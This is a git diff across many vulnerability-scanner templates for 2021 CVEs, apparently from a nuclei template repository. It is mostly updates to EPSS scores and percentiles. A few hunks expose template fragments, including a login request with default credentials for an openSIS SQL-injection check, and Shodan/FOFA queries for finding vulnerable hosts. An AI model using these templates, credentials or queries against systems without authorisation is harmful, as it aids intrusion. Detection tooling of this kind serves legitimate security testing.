b/http/cves/2021/CVE-2021-40960.yaml index 78ba6286d6..d1f89aae09 100644 --- a/http/cves/2021/CVE-2021-40960.yaml +++ b/http/cves/2021/CVE-2021-40960.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40960 cwe-id: CWE-22 - epss-score: 0.00971 + epss-score: 0.01168 cpe: cpe:2.3:a:galera:galera_webtemplate:1.0:*:*:*:*:*:*:* + epss-percentile: 0.83172 metadata: max-request: 1 vendor: galera diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index 94aac67cf4..c518342ed8 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-40968 cwe-id: CWE-79 - epss-score: 0.00163 + epss-score: 0.00158 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* + epss-percentile: 0.51596 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index f518d6ec1f..1cdda3884e 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-40969 cwe-id: CWE-79 - epss-score: 0.00163 + epss-score: 0.00158 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* + epss-percentile: 0.51596 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index 9416eaef98..82d824c580 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-40970 cwe-id: CWE-79 - epss-score: 0.00163 + epss-score: 0.00158 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* + epss-percentile: 0.51596 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index e8ec8beddd..895c242f1d 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-40971 cwe-id: CWE-79 - epss-score: 0.00163 + epss-score: 0.00158 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* + epss-percentile: 0.51596 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml index c5ca225bc2..fc341602f5 100644 --- a/http/cves/2021/CVE-2021-40972.yaml +++ b/http/cves/2021/CVE-2021-40972.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-40972 cwe-id: CWE-79 - epss-score: 0.00163 + epss-score: 0.00158 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* + epss-percentile: 0.51596 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index 1a68b2596c..fc80b21289 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-40973 cwe-id: CWE-79 - epss-score: 0.00163 + epss-score: 0.00158 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* + epss-percentile: 0.51596 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2021/CVE-2021-40978.yaml b/http/cves/2021/CVE-2021-40978.yaml index f37c68aeb3..d9c990e2a4 100644 --- a/http/cves/2021/CVE-2021-40978.yaml +++ b/http/cves/2021/CVE-2021-40978.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.04273 cpe: cpe:2.3:a:mkdocs:mkdocs:1.2.2:*:*:*:*:*:*:* + epss-percentile: 0.91189 metadata: max-request: 1 vendor: mkdocs diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml index 9292b34a3c..68be01e7a1 100644 --- a/http/cves/2021/CVE-2021-41174.yaml +++ b/http/cves/2021/CVE-2021-41174.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-41174 cwe-id: CWE-79 - epss-score: 0.96376 + epss-score: 0.96462 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* + epss-percentile: 0.99384 metadata: max-request: 1 shodan-query: title:"Grafana" diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml index 2d80f68ac7..786a12e687 100644 --- a/http/cves/2021/CVE-2021-41192.yaml +++ b/http/cves/2021/CVE-2021-41192.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.5 cve-id: CVE-2021-41192 cwe-id: CWE-1188 - epss-score: 0.00499 + epss-score: 0.00805 cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:* + epss-percentile: 0.79527 metadata: max-request: 2 shodan-query: http.favicon.hash:698624197 diff --git a/http/cves/2021/CVE-2021-41266.yaml b/http/cves/2021/CVE-2021-41266.yaml index f1d56f80a2..ca7f8c0349 100644 --- a/http/cves/2021/CVE-2021-41266.yaml +++ b/http/cves/2021/CVE-2021-41266.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-41266 cwe-id: CWE-306 - epss-score: 0.05608 + epss-score: 0.04636 cpe: cpe:2.3:a:min:minio_console:*:*:*:*:*:*:*:* + epss-percentile: 0.91526 metadata: max-request: 1 vendor: min diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index 37e2a0716d..8ae375608a 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -15,9 +15,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-41277 - cwe-id: CWE-20,CWE-200 - epss-score: 0.967 + cwe-id: CWE-200,CWE-22 + epss-score: 0.95953 cpe: cpe:2.3:a:metabase:metabase:0.40.0:-:*:*:*:*:*:* + epss-percentile: 0.99232 metadata: max-request: 1 fofa-query: app="Metabase" diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml index dba6d55e6c..a7ab3e8702 100644 --- a/http/cves/2021/CVE-2021-41282.yaml +++ b/http/cves/2021/CVE-2021-41282.yaml @@ -19,8 +19,9 @@ info: cvss-score: 8.8 cve-id: CVE-2021-41282 cwe-id: CWE-74 - epss-score: 0.97396 + epss-score: 0.97136 cpe: cpe:2.3:a:pfsense:pfsense:2.5.2:*:*:*:*:*:*:* + epss-percentile: 0.99688 metadata: max-request: 4 vendor: pfsense diff --git a/http/cves/2021/CVE-2021-41291.yaml b/http/cves/2021/CVE-2021-41291.yaml index 83e774034b..793f16aba3 100644 --- a/http/cves/2021/CVE-2021-41291.yaml +++ b/http/cves/2021/CVE-2021-41291.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41291 cwe-id: CWE-22 - epss-score: 0.09024 + epss-score: 0.11826 cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.94586 metadata: max-request: 1 vendor: ecoa diff --git a/http/cves/2021/CVE-2021-41293.yaml b/http/cves/2021/CVE-2021-41293.yaml index 7259b35d58..5d748b42e0 100644 --- a/http/cves/2021/CVE-2021-41293.yaml +++ b/http/cves/2021/CVE-2021-41293.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41293 cwe-id: CWE-22 - epss-score: 0.09024 + epss-score: 0.11826 cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.94586 metadata: max-request: 1 vendor: ecoa diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index 813c19f519..a68643e91a 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml @@ -15,8 +15,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-41349 - epss-score: 0.96427 + epss-score: 0.96426 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* + epss-percentile: 0.99374 metadata: max-request: 1 vendor: microsoft diff --git a/http/cves/2021/CVE-2021-41381.yaml b/http/cves/2021/CVE-2021-41381.yaml index 7713b44646..12bbb31b48 100644 --- a/http/cves/2021/CVE-2021-41381.yaml +++ b/http/cves/2021/CVE-2021-41381.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41381 cwe-id: CWE-22 - epss-score: 0.04023 + epss-score: 0.04909 cpe: cpe:2.3:a:payara:micro_community:*:*:*:*:*:*:*:* + epss-percentile: 0.91773 metadata: max-request: 1 vendor: payara diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml index a9d0d62d2d..c9e818bead 100644 --- a/http/cves/2021/CVE-2021-41432.yaml +++ b/http/cves/2021/CVE-2021-41432.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00084 cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* + epss-percentile: 0.34562 metadata: max-request: 4 shodan-query: http.html:"Flatpress" diff --git a/http/cves/2021/CVE-2021-41460.yaml b/http/cves/2021/CVE-2021-41460.yaml index 8b1ed2faf3..b327c80398 100644 --- a/http/cves/2021/CVE-2021-41460.yaml +++ b/http/cves/2021/CVE-2021-41460.yaml @@ -10,13 +10,20 @@ info: - https://www.cnvd.org.cn/flaw/show/CNVD-2020-58823 - https://nvd.nist.gov/vuln/detail/CVE-2021-41460 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2021-41460 + cwe-id: CWE-89 + epss-score: 0.01115 + cpe: cpe:2.3:a:shopex:ecshop:4.1.0:*:*:*:*:*:*:* + epss-percentile: 0.82751 metadata: max-request: 1 verified: true fofa-query: product="ECShop" + vendor: shopex + product: ecshop tags: cve,cve2021,cnvd,cnvd2020,ecshop,sqli - variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml index f0b8fad5f6..825cbd12b8 100644 --- a/http/cves/2021/CVE-2021-41467.yaml +++ b/http/cves/2021/CVE-2021-41467.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-41467 cwe-id: CWE-79 - epss-score: 0.00143 + epss-score: 0.00138 cpe: cpe:2.3:a:justwriting_project:justwriting:1.0.0:*:*:*:*:*:*:* + epss-percentile: 0.48606 metadata: max-request: 1 vendor: justwriting_project diff --git a/http/cves/2021/CVE-2021-41569.yaml b/http/cves/2021/CVE-2021-41569.yaml index 1ce26016c9..64c2765b76 100644 --- a/http/cves/2021/CVE-2021-41569.yaml +++ b/http/cves/2021/CVE-2021-41569.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-829 epss-score: 0.00978 cpe: cpe:2.3:a:sas:sas\/intrnet:*:*:*:*:*:*:*:* + epss-percentile: 0.81497 metadata: max-request: 1 vendor: sas diff --git a/http/cves/2021/CVE-2021-41648.yaml b/http/cves/2021/CVE-2021-41648.yaml index bd477954e0..fdde12722b 100644 --- a/http/cves/2021/CVE-2021-41648.yaml +++ b/http/cves/2021/CVE-2021-41648.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41648 cwe-id: CWE-89 - epss-score: 0.03094 + epss-score: 0.04318 cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:* + epss-percentile: 0.91227 metadata: max-request: 1 vendor: online-shopping-system-advanced_project diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml index 08bb10cbdc..f2f70aa26f 100644 --- a/http/cves/2021/CVE-2021-41649.yaml +++ b/http/cves/2021/CVE-2021-41649.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-41649 cwe-id: CWE-89 - epss-score: 0.02803 + epss-score: 0.03215 cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:* + epss-percentile: 0.89928 metadata: max-request: 1 vendor: online-shopping-system-advanced_project diff --git a/http/cves/2021/CVE-2021-41653.yaml b/http/cves/2021/CVE-2021-41653.yaml index 5d7364a949..f5863483f8 100644 --- a/http/cves/2021/CVE-2021-41653.yaml +++ b/http/cves/2021/CVE-2021-41653.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-41653 cwe-id: CWE-94 - epss-score: 0.94766 + epss-score: 0.95457 cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99108 metadata: max-request: 2 vendor: tp-link diff --git a/http/cves/2021/CVE-2021-41691.yaml b/http/cves/2021/CVE-2021-41691.yaml index e4ebd36140..5f0d078822 100644 --- a/http/cves/2021/CVE-2021-41691.yaml +++ b/http/cves/2021/CVE-2021-41691.yaml @@ -11,10 +11,9 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169 classification: cve-id: CVE-2021-41691 - tags: sqli,auth,edb,cve,cve2021,opensis metadata: max-request: 2 - + tags: sqli,auth,edb,cve,cve2021,opensis variables: num: "999999999" @@ -27,7 +26,6 @@ http: Content-Type: application/x-www-form-urlencoded USERNAME={{username}}&PASSWORD={{password}}&language=en&log= - - | POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 Host: {{Hostname}} @@ -40,10 +38,8 @@ http: payloads: username: - student - password: - student@123 - req-condition: true cookie-reuse: true matchers: diff --git a/http/cves/2021/CVE-2021-41773.yaml b/http/cves/2021/CVE-2021-41773.yaml index 86b8498c05..72914709ae 100644 --- a/http/cves/2021/CVE-2021-41773.yaml +++ b/http/cves/2021/CVE-2021-41773.yaml @@ -20,6 +20,7 @@ info: cwe-id: CWE-22 epss-score: 0.97532 cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:* + epss-percentile: 0.99986 metadata: max-request: 3 shodan-query: Apache 2.4.49 diff --git a/http/cves/2021/CVE-2021-41826.yaml b/http/cves/2021/CVE-2021-41826.yaml index 287bd1b5c7..3d65c97eae 100644 --- a/http/cves/2021/CVE-2021-41826.yaml +++ b/http/cves/2021/CVE-2021-41826.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-601 epss-score: 0.93913 cpe: cpe:2.3:a:place:placeos_authentication:*:*:*:*:*:*:*:* + epss-percentile: 0.988 metadata: max-request: 1 vendor: place diff --git a/http/cves/2021/CVE-2021-41878.yaml b/http/cves/2021/CVE-2021-41878.yaml index 73585d98e7..762c9f9495 100644 --- a/http/cves/2021/CVE-2021-41878.yaml +++ b/http/cves/2021/CVE-2021-41878.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00476 cpe: cpe:2.3:a:hkurl:i-panel_administration_system:2.0:*:*:*:*:*:*:* + epss-percentile: 0.72656 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml index 67e286301a..bb1e8ebefb 100644 --- a/http/cves/2021/CVE-2021-4191.yaml +++ b/http/cves/2021/CVE-2021-4191.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.3 cve-id: CVE-2021-4191 cwe-id: CWE-287 - epss-score: 0.74106 + epss-score: 0.46947 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* + epss-percentile: 0.96965 metadata: max-request: 1 vendor: gitlab diff --git a/http/cves/2021/CVE-2021-41951.yaml b/http/cves/2021/CVE-2021-41951.yaml index 91e3761d8f..95490c3903 100644 --- a/http/cves/2021/CVE-2021-41951.yaml +++ b/http/cves/2021/CVE-2021-41951.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.74732 cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* + epss-percentile: 0.97725 metadata: max-request: 1 vendor: montala diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index 0e7714cf99..3b003e12a5 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -18,8 +18,9 @@ info: cvss-score: 9.8 cve-id: "CVE-2021-42013" cwe-id: CWE-22 - epss-score: 0.97514 + epss-score: 0.97515 cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:* + epss-percentile: 0.99973 metadata: max-request: 3 verified: true diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml index 414f6cf892..78533e9120 100644 --- a/http/cves/2021/CVE-2021-42063.yaml +++ b/http/cves/2021/CVE-2021-42063.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-42063 cwe-id: CWE-79 - epss-score: 0.00346 + epss-score: 0.00377 cpe: cpe:2.3:a:sap:knowledge_warehouse:7.30:*:*:*:*:*:*:* + epss-percentile: 0.69374 metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 diff --git a/http/cves/2021/CVE-2021-42071.yaml b/http/cves/2021/CVE-2021-42071.yaml index e455e406f9..73ae9a238e 100644 --- a/http/cves/2021/CVE-2021-42071.yaml +++ b/http/cves/2021/CVE-2021-42071.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42071 cwe-id: CWE-78 - epss-score: 0.95544 + epss-score: 0.9564 cpe: cpe:2.3:o:visual-tools:dvr_vx16_firmware:4.2.28.0:*:*:*:*:*:*:* + epss-percentile: 0.99153 metadata: max-request: 1 vendor: visual-tools diff --git a/http/cves/2021/CVE-2021-42192.yaml b/http/cves/2021/CVE-2021-42192.yaml index d12b37a803..f703b36982 100644 --- a/http/cves/2021/CVE-2021-42192.yaml +++ b/http/cves/2021/CVE-2021-42192.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-863 epss-score: 0.0106 cpe: cpe:2.3:a:konga_project:konga:0.14.9:*:*:*:*:*:*:* + epss-percentile: 0.82302 metadata: max-request: 3 vendor: konga_project diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml index 9cdb5f2832..cfb3c3d952 100644 --- a/http/cves/2021/CVE-2021-42237.yaml +++ b/http/cves/2021/CVE-2021-42237.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42237 cwe-id: CWE-502 - epss-score: 0.97543 + epss-score: 0.97532 cpe: cpe:2.3:a:sitecore:experience_platform:7.5:-:*:*:*:*:*:* + epss-percentile: 0.99984 metadata: max-request: 1 shodan-query: http.title:"SiteCore" diff --git a/http/cves/2021/CVE-2021-42258.yaml b/http/cves/2021/CVE-2021-42258.yaml index 8bedaf8481..7c99b15d17 100644 --- a/http/cves/2021/CVE-2021-42258.yaml +++ b/http/cves/2021/CVE-2021-42258.yaml @@ -13,8 +13,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42258 cwe-id: CWE-89 - epss-score: 0.97451 + epss-score: 0.97388 cpe: cpe:2.3:a:bqe:billquick_web_suite:*:*:*:*:*:*:*:* + epss-percentile: 0.99868 metadata: max-request: 2 vendor: bqe diff --git a/http/cves/2021/CVE-2021-42551.yaml b/http/cves/2021/CVE-2021-42551.yaml index 969fafc35d..1f693a97b5 100644 --- a/http/cves/2021/CVE-2021-42551.yaml +++ b/http/cves/2021/CVE-2021-42551.yaml @@ -13,8 +13,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-42551 cwe-id: CWE-79 - epss-score: 0.00165 + epss-score: 0.00124 cpe: cpe:2.3:a:alcoda:netbiblio:*:*:*:*:*:*:*:* + epss-percentile: 0.46073 metadata: max-request: 2 vendor: alcoda diff --git a/http/cves/2021/CVE-2021-42565.yaml b/http/cves/2021/CVE-2021-42565.yaml index d362d62306..ead8cefdc8 100644 --- a/http/cves/2021/CVE-2021-42565.yaml +++ b/http/cves/2021/CVE-2021-42565.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00102 cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:* + epss-percentile: 0.40864 metadata: max-request: 2 vendor: myfactory diff --git a/http/cves/2021/CVE-2021-42566.yaml b/http/cves/2021/CVE-2021-42566.yaml index 45576618fd..fe6e3520ea 100644 --- a/http/cves/2021/CVE-2021-42566.yaml +++ b/http/cves/2021/CVE-2021-42566.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00102 cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:* + epss-percentile: 0.40864 metadata: max-request: 2 vendor: myfactory diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index d99956030e..17a28d661d 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.25981 cpe: cpe:2.3:a:apereo:central_authentication_service:*:*:*:*:*:*:*:* + epss-percentile: 0.961 metadata: max-request: 1 shodan-query: http.title:'CAS - Central Authentication Service' diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml index 41b788816c..0ffb964cfd 100644 --- a/http/cves/2021/CVE-2021-42627.yaml +++ b/http/cves/2021/CVE-2021-42627.yaml @@ -16,8 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-42627 - epss-score: 0.02865 + epss-score: 0.05762 cpe: cpe:2.3:o:dlink:dir-615_firmware:20.06:*:*:*:*:*:*:* + epss-percentile: 0.92386 metadata: max-request: 1 shodan-query: http.title:"Roteador Wireless" diff --git a/http/cves/2021/CVE-2021-42663.yaml b/http/cves/2021/CVE-2021-42663.yaml index 7093dfa21d..9e7b70772a 100644 --- a/http/cves/2021/CVE-2021-42663.yaml +++ b/http/cves/2021/CVE-2021-42663.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00116 cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:* + epss-percentile: 0.44596 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-42667.yaml b/http/cves/2021/CVE-2021-42667.yaml index f95d0abd91..148fda23d9 100644 --- a/http/cves/2021/CVE-2021-42667.yaml +++ b/http/cves/2021/CVE-2021-42667.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42667 cwe-id: CWE-89 - epss-score: 0.01846 + epss-score: 0.02869 cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:* + epss-percentile: 0.89414 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml index e05e6b2553..d12c18dee8 100644 --- a/http/cves/2021/CVE-2021-42887.yaml +++ b/http/cves/2021/CVE-2021-42887.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42887 cwe-id: CWE-287 - epss-score: 0.01788 + epss-score: 0.01827 cpe: cpe:2.3:o:totolink:ex1200t_firmware:4.1.2cu.5215:*:*:*:*:*:*:* + epss-percentile: 0.86733 metadata: max-request: 2 shodan-query: title:"TOTOLINK" diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml index 65f78aa40d..e25b36a6a3 100644 --- a/http/cves/2021/CVE-2021-43062.yaml +++ b/http/cves/2021/CVE-2021-43062.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-43062 cwe-id: CWE-79 - epss-score: 0.00303 + epss-score: 0.00465 cpe: cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:* + epss-percentile: 0.72371 metadata: max-request: 1 vendor: fortinet diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index df1fb96517..96ac4cb8f3 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-43287 cwe-id: CWE-200 - epss-score: 0.67663 + epss-score: 0.70378 cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:* + epss-percentile: 0.97594 metadata: max-request: 1 shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" diff --git a/http/cves/2021/CVE-2021-43421.yaml b/http/cves/2021/CVE-2021-43421.yaml index da2db5ef77..b64e238573 100644 --- a/http/cves/2021/CVE-2021-43421.yaml +++ b/http/cves/2021/CVE-2021-43421.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-434 epss-score: 0.02563 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* + epss-percentile: 0.88849 metadata: max-request: 3 verified: true diff --git a/http/cves/2021/CVE-2021-43495.yaml b/http/cves/2021/CVE-2021-43495.yaml index 47d3cac009..61c85abf76 100644 --- a/http/cves/2021/CVE-2021-43495.yaml +++ b/http/cves/2021/CVE-2021-43495.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-22 epss-score: 0.05064 cpe: cpe:2.3:a:alquistai:alquist:2017-06-13:*:*:*:*:*:*:* + epss-percentile: 0.91909 metadata: max-request: 1 vendor: alquistai diff --git a/http/cves/2021/CVE-2021-43496.yaml b/http/cves/2021/CVE-2021-43496.yaml index c457eb4ba1..6dc7fd0f6c 100644 --- a/http/cves/2021/CVE-2021-43496.yaml +++ b/http/cves/2021/CVE-2021-43496.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-22 epss-score: 0.05064 cpe: cpe:2.3:a:clustering_project:clustering:2019-07-26:*:*:*:*:*:*:* + epss-percentile: 0.91909 metadata: max-request: 1 vendor: clustering_project diff --git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml index 23be13420b..2eb88af712 100644 --- a/http/cves/2021/CVE-2021-43510.yaml +++ b/http/cves/2021/CVE-2021-43510.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-43510 cwe-id: CWE-89 - epss-score: 0.01198 + epss-score: 0.01901 cpe: cpe:2.3:a:simple_client_management_system_project:simple_client_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.87048 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml index 9d87eff78d..72bce40fec 100644 --- a/http/cves/2021/CVE-2021-43574.yaml +++ b/http/cves/2021/CVE-2021-43574.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00145 cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* + epss-percentile: 0.49646 metadata: max-request: 3 shodan-query: http.html:"Powered by Atmail" diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml index 01f6e24a52..6c1126d8c6 100644 --- a/http/cves/2021/CVE-2021-43725.yaml +++ b/http/cves/2021/CVE-2021-43725.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-43725 cwe-id: CWE-79 - epss-score: 0.00148 + epss-score: 0.0016 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* + epss-percentile: 0.51978 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml index 0d2055596a..89c09b2a93 100644 --- a/http/cves/2021/CVE-2021-43734.yaml +++ b/http/cves/2021/CVE-2021-43734.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-43734 cwe-id: CWE-22 - epss-score: 0.00536 + epss-score: 0.02295 cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:* + epss-percentile: 0.88264 metadata: max-request: 2 shodan-query: http.html:"kkFileView" diff --git a/http/cves/2021/CVE-2021-43778.yaml b/http/cves/2021/CVE-2021-43778.yaml index c76833e2b0..67fbb8b15a 100644 --- a/http/cves/2021/CVE-2021-43778.yaml +++ b/http/cves/2021/CVE-2021-43778.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-43778 cwe-id: CWE-22 - epss-score: 0.64298 + epss-score: 0.75886 cpe: cpe:2.3:a:glpi-project:barcode:*:*:*:*:*:*:*:* + epss-percentile: 0.97757 metadata: max-request: 1 vendor: glpi-project diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml index 